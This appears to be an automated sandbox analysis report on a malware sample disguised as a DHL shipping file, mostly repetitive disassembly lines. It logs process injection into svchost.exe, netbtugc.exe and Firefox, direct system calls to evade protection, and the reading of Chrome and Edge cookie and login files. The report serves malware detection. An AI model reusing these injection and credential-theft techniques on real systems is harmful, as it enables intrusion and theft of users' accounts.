            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E420 mov eax, dword ptr fs:[00000030h]2_2_0332E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C427 mov eax, dword ptr fs:[00000030h]2_2_0332C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6420 mov eax, dword ptr fs:[00000030h]2_2_033B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368402 mov eax, dword ptr fs:[00000030h]2_2_03368402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335A470 mov eax, dword ptr fs:[00000030h]2_2_0335A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC460 mov ecx, dword ptr fs:[00000030h]2_2_033BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA456 mov eax, dword ptr fs:[00000030h]2_2_033EA456
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0332645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03360854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03342840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03330887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0335EF28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03332F12 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03404F68 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0336CF1F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_008080A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007DA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007DA124 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe Thread register set: target process: 4676
            Source: C:\Windows\SysWOW64\netbtugc.exe Thread APC queued: target process: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 634008
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_008087B1 LogonUserW
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_00814C27 mouse_event
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 40312052024.exe"
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_00807CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_0080874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: DHL 40312052024.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120674994.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000002.4473052387.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473116151.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: DHL 40312052024.exe, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120674994.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000002.4473052387.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120674994.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000002.4473052387.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473116151.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000000.2120674994.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000003.00000002.4473052387.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, oYzsgiLOOTqCTABCCGZlOCaAgG.exe, 00000006.00000002.4473116151.0000000000FF1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007D862B cpuid
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007E4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007F1E06 GetUserNameW
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007E3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\DHL 40312052024.exe Code function: 0_2_007B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4472233099.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2201456108.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4473466571.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4473431930.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475242478.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4473348288.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2202258982.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2202388210.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
